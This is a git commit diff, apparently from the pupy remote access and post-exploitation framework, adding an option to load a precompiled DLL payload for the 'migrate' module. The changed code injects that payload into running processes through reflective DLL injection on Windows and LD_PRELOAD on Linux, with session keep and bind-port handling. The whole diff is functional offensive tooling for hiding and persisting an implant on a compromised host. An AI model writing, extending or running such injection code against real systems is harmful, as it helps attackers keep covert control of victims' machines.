migrate: Add argument to pass precompiled payload

2019-11-10 10:28:18 +02:00 · 2019-11-10 10:28:18 +02:00 · fa08c06db6
parent d4d094c469
commit fa08c06db6
3 changed files with 51 additions and 33 deletions
--- a/pupy/modules/lib/linux/migrate.py
+++ b/pupy/modules/lib/linux/migrate.py
@ -18,21 +18,28 @@ def has_proc_migrated(client, pid):
                return c
    return None

-def get_payload(module, compressed=True, debug=False):
-    conf = module.client.get_conf()
-    dllbuf, _, _ = pupygen.generate_binary_from_template(
-        module.log,
-        conf, 'linux',
-        arch=module.client.arch, shared=True,
-        debug=debug or conf['debug']
-    )
+def get_payload(module, compressed=True, debug=False, from_payload=None):
+    dllbuff = None
+    if from_payload:
+        with open(from_payload, 'rb') as payload:
+            dllbuff = payload.read()
+
+        module.success('Precompiled payload: {}'.format(from_payload))
+    else:
+        conf = module.client.get_conf()
+        dllbuff, _, _ = pupygen.generate_binary_from_template(
+            module.log,
+            conf, 'linux',
+            arch=module.client.arch, shared=True,
+            debug=debug or conf['debug']
+        )

    if not compressed:
-        return dllbuf
+        return dllbuff

    dllgzbuf = cStringIO.StringIO()
    gzf = gzip.GzipFile('pupy.so', 'wb', 9, dllgzbuf)
-    gzf.write(dllbuf)
+    gzf.write(dllbuff)
    gzf.close()

    return dllgzbuf.getvalue()
@ -56,8 +63,8 @@ def wait_connect(module, pid, timeout=10):

        time.sleep(1)

-def ld_preload(module, command, wait_thread=False, keep=False, debug=False):
-    payload = get_payload(module, debug)
+def ld_preload(module, command, wait_thread=False, keep=False, debug=False, from_payload=None):
+    payload = get_payload(module, debug, from_payload=from_payload)

    pid = module.client.conn.modules['pupy'].ld_preload_inject_dll(
        command, payload, wait_thread
@ -74,8 +81,8 @@ def ld_preload(module, command, wait_thread=False, keep=False, debug=False):

    module.success("migration completed")

-def migrate(module, pid, keep=False, timeout=10, debug=False):
-    payload = get_payload(module, debug)
+def migrate(module, pid, keep=False, timeout=10, debug=False, from_payload=None):
+    payload = get_payload(module, debug, from_payload=from_payload)

    r = module.client.conn.modules['pupy'].reflective_inject_dll(
        pid, payload
--- a/pupy/modules/lib/windows/migrate.py
+++ b/pupy/modules/lib/windows/migrate.py
@ -8,11 +8,12 @@ def has_proc_migrated(client, pid):
                return c
    return None

-def migrate(module, pid, keep=False, timeout=30, bindPort=None, debug=False):
+def migrate(module, pid, keep=False, timeout=30, bindPort=None, debug=False, from_payload=None):
    '''
    - bindPort: The port used for listening on the target WHEN the current launcher uses a BIND connection.
                When the current launcher uses a BIND connection, this session is kept even if keep==False
-                When bindPort!=None and the current launcher uses a REVERSE connection (e.g. connect, auto_proxy), bindPort is not used in this function
+                When bindPort!=None and the current launcher uses a REVERSE connection (e.g. connect, auto_proxy),
+                bindPort is not used in this function
    '''
    module.client.load_package('pupwinutils.processes')
    isProcess64bits = False
@ -32,25 +33,34 @@ def migrate(module, pid, keep=False, timeout=30, bindPort=None, debug=False):
        arch ='x86'
        module.success("process is 32 bits")

-    conf = module.client.get_conf()
+    dllbuff = None
+    if from_payload:
+        with open(from_payload, 'rb') as payload:
+            dllbuff = payload.read()

-    #Manage when current launcher uses a BIND connection (and not a REVERSE connection)
-    if module.client.desc['launcher'] not in ('connect', 'auto_proxy'):
        keep = True
-        module.warning('Enable keep (forced)')
+        module.success('Precompiled payload: {}'.format(from_payload))
+    else:
+        conf = module.client.get_conf()

-    if module.client.desc['launcher'] == "bind":
-        isBindConnection = True
-        module.success("the current launcher uses a bind connection")
-        module.success("the bind port {0} is defined in DLL configuration".format(bindPort))
-        conf['launcher_args'][conf['launcher_args'].index("--port")+1] = str(bindPort)
+        #Manage when current launcher uses a BIND connection (and not a REVERSE connection)
+        if module.client.desc['launcher'] not in ('connect', 'auto_proxy'):
+            keep = True
+            module.warning('Enable keep (forced)')

-    dllbuff, filename, _ = pupygen.generate_binary_from_template(
-        module.log,
-        conf, 'windows',
-        arch=arch, shared=True, debug=debug
-    )
-    module.success("Template: {}".format(filename))
+        if module.client.desc['launcher'] == "bind":
+            isBindConnection = True
+            module.success("the current launcher uses a bind connection")
+            module.success("the bind port {0} is defined in DLL configuration".format(bindPort))
+            conf['launcher_args'][conf['launcher_args'].index("--port")+1] = str(bindPort)
+
+        dllbuff, filename, _ = pupygen.generate_binary_from_template(
+            module.log,
+            conf, 'windows',
+            arch=arch, shared=True, debug=debug
+        )
+
+        module.success("Template: {}".format(filename))

    module.success("injecting DLL in target process %s ..."%pid)

--- a/pupy/modules/migrate.py
+++ b/pupy/modules/migrate.py
@ -32,6 +32,7 @@ class MigrateModule(PupyModule):
        group.add_argument('-p', '--process', metavar='process_name',
                            help='search a process name and migrate into')
        group.add_argument('pid', nargs='?', type=int, help='pid')
+        cls.arg_parser.add_argument('-P', '--payload', help='Use precompiled payload. Must be DLL')
        cls.arg_parser.add_argument(
            '-k', '--keep', action='store_true',
            help='migrate into the process but create a new session and keep the current pupy session running')
@ -74,7 +75,7 @@ class MigrateModule(PupyModule):
            else:
                self.success("Migrating to existing windows process identified with the pid {0}".format(args.pid))
                pid=args.pid
-            win_migrate(self, pid, args.keep, args.timeout, bindPort=listeningPort, debug=args.debug)
+            win_migrate(self, pid, args.keep, args.timeout, bindPort=listeningPort, debug=args.debug, from_payload=args.payload)
            if isBindConnection:
                listeningAddress = self.client.desc['address'].split(':')[0]
                listeningAddressPortForBind = "{0}:{1}".format(listeningAddress, listeningPort)
@ -82,7 +83,7 @@ class MigrateModule(PupyModule):
        elif self.client.is_linux():
            if args.create:
                self.success("Migrating to new linux process using LD_PRELOAD")
-                ld_preload(self, args.create, wait_thread=args.no_wait, keep=args.keep, debug=args.debug)
+                ld_preload(self, args.create, wait_thread=args.no_wait, keep=args.keep, debug=args.debug, from_payload=args.payload)
            else:
                self.success("Migrating to existing linux process")
                lin_migrate(self, args.pid, args.keep, debug=args.debug)